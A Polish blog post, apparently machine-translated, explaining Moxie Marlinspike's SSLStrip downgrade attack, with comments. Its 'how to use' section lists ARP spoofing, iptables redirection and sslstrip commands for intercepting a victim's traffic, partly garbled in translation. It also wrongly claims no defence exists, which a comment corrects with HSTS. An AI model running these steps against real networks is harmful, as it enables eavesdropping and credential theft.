SSLStrip: szpiegowanie ruchu SSL

Moxie Marlinspike zaprezentowana na Czarny kapelusz 2009 sprytne narzędzie o nazwie SSLStrip, skierowany do przekonać użytkownika, że ​​znajduje się na stronie internetowej z szyfrowaniem SSL, podczas gdy w rzeczywistości wszystkie dane są przesyłane w sposób jawny. Ponadto SSLStrip oszukuje również serwer WWW, którego rzekome szyfrowanie jest pomijane, mimo że witryna nadal zachowuje się tak, jakby działała.

O ile mogłem się domyślić, ta metoda nadal działa świetnie. Zagrożenie wciąż istnieje i wszyscy jesteśmy narażeni. Buahaha ...

Zacznijmy od podstaw: czym do cholery jest SSL?

Dla tych, którzy nie wiedzą, Secure Sockets Layer (SSL; Secure Sockets Layer Protocol) i jego następca Transport Layer Security (TLS; Transport Layer Security) protokoły kryptograficzne zapewniające bezpieczną komunikację w sieci, powszechnie w Internecie.

SSL działa na warstwie między protokołami aplikacji, takimi jak HTTP, SMTP, NNTP i przez protokół transportowy TCP, który jest częścią rodziny protokołów TCP / IP. Chociaż może zapewnić bezpieczeństwo dla każdego protokołu, który korzysta z zaufanych połączeń (takich jak TCP), jest używany w większości przypadków w połączeniu z HTTP do utworzenia HTTPS. HTTPS służy do zabezpieczania stron WWW dla aplikacji internetowych. E-commerce, używając certyfikatów klucza publicznego do weryfikacji tożsamości punktów końcowych.

SSLStrip… czy pornografia powróciła do Let's Use Linux?

Działanie SSLStrip to jest proste, zastąpić wszystkie żądania HTTPS strony internetowej przez HTTP, a następnie wykonuje MITM (atak «Man in the Middle«) Pomiędzy serwerem a klientem. Chodzi o to, że ofiara i atakujący komunikują się przez HTTP, podczas gdy atakujący i serwer komunikują się przez HTTPS z certyfikatem serwera. W ten sposób atakujący może zobaczyć cały ruch ofiary w postaci zwykłego tekstu.

Oto film, w którym możemy zobaczyć, jak działa to doskonałe narzędzie.

Jak korzystać z SSLStrip

1.- Skonfiguruj przekazywanie IP

echo 1> / proc / sys / net / ipv4 / ip_forward

2.- Wykonywanie ataku ARP MITM między 2 maszynami:

arpspoof -i eth0 -t GOSPODARZ OFIARY

3.- Przekieruj ruch z iptables:

iptables -t nat -A PREROUTING -p tcp - port docelowy 80 -j REDIRECT - do portów 8080

4.- Uruchom SSLStrip na używanym porcie

python sslstrip.py -w plik

Jak chronić się przed atakami SSLStrip?

To jest najpiękniejsze i najstraszniejsze: nie może.

Jak wykazał Moxie (jego wideo nie marnuje się niewiele więcej niż 69 minut) jedynym prawdopodobnym rozwiązaniem tego wszystkiego jest szyfrowanie wszystkich połączeń HTTP, to znaczy, że powszechny i ​​dziki „HTTP” jest zastępowany we wszystkich jego wystąpieniach przez „HTTPS”, niezależnie od strony lub usługi . Jak to ujęła Moxie,problem stanowi bezpieczny protokół, który zależy od niezabezpieczonego protokołu".

Co przynajmniej możesz zrobić jako użytkownik zmniejszyć ryzyko ataku? Sprawdź w paranoiczny sposób, czy przed każdą przejętą stroną znajduje się „https” lub w przypadku instalacji przeglądarki Firefox NoScript i wymuszaj połączenia HTTPS na wszystkich stronach. A przecież to tylko zminimalizuje efekt, a nie go neguje.

źródło: smoczy słoik & Moxie

Dziękujemy Francisco za przekazanie nam informacji!

Zostaw swój komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

*

*

  1. Odpowiedzialny za dane: Miguel Ángel Gatón
  2. Cel danych: kontrola spamu, zarządzanie komentarzami.
  3. Legitymacja: Twoja zgoda
  4. Przekazywanie danych: Dane nie będą przekazywane stronom trzecim, z wyjątkiem obowiązku prawnego.
  5. Przechowywanie danych: baza danych hostowana przez Occentus Networks (UE)
  6. Prawa: w dowolnym momencie możesz ograniczyć, odzyskać i usunąć swoje dane.

  1.   Guido Ignacy Ignacy powiedział

    Mmmm… jeśli chodzi o https, który chroni cię przed skrótem, to jest względne.

    Nie wiem, w jakim stopniu ataki MITM nie są skuteczne w przypadku połączeń SSL, ataki MITM działają na warstwie łącza, a ssl na warstwie transportowej, więc przechwytywanie danych jest możliwe.

    Dawno temu robiłem testy do pracy kursu, który zrobiłem z mitm w mojej sieci lokalnej i można pobrać dane wysyłane przez SSL, wypróbować hotmail (który jest ssl) i bez problemu zwraca przepustkę. Pomyśl tylko, że osoba atakująca podszywa się pod bramę i otrzymuje wszystkie informacje od ofiary.

    Jedynym sposobem, aby dowiedzieć się, że Twoje informacje są bezpiecznie przesyłane, jest użycie tunelu SSH.

    To, co robię, jeśli czuję się nieco prześladowany, to łączenie się z moim serwerem za pomocą ssh, tunelowanie przez port lokalny, otwieranie gniazd i używanie mojego połączenia internetowego w domu do nawigacji na czyimś komputerze.

    Jak powiedzieli, nie ma sposobu, aby uniknąć tego ataku, poza zabezpieczeniem naszego dhcp przez mac i zabezpieczeniem, kto się łączy….

  2.   pablord powiedział

    witam, w poleceniu 4 brakowało "-l 8080"

  3.   Użyjmy Linuksa powiedział

    w porządku. dzięki!

  4.   Marcin Farias powiedział

    Mówiąc dokładniej, punkt, w którym nie możesz już się chronić, jest kiedyś złapany w ataku MitM. Istnieją różne sposoby na obronę przed tym atakiem, choć jest to trudne, ponieważ ma różne warianty.

    EDIT:

    Aktualizacja komentarzy jest tego warta! Dowiedziałem się, że przynajmniej od stycznia 2012 przeglądarki chrome i firefox (nie zdziwiłbym się, gdyby wszystkie były w tym momencie) używają nagłówków HSTS. Podobno wspomniany nagłówek rozwiązuje tę lukę, informując przeglądarkę, że „połączenia” muszą zawsze używać SSL po pierwszej próbie połączenia się z witryną (dzięki temu luka jest minimalnie obecna). Co więcej, Chrome zwiększa bezpieczeństwo, dodając listę witryn HSTS (prawdopodobnie najpopularniejszych w sieci). źródło: http://forums.hak5.org/index.php?/topic/25322-sslstrip-not-working-with-gmail-twitter/

  5.   HacKan & CuBa co. powiedział

    Bardzo dobrze, myślę, że jest super. Pomysł jest naprawdę prosty 😀

  6.   Użyjmy Linuksa powiedział

    Więc jest…

  7.   ChambertuX powiedział

    Czy ktoś wie, czy arpspoof można używać, gdy w sieci mamy więcej niż jeden host? Dziękuję Ci.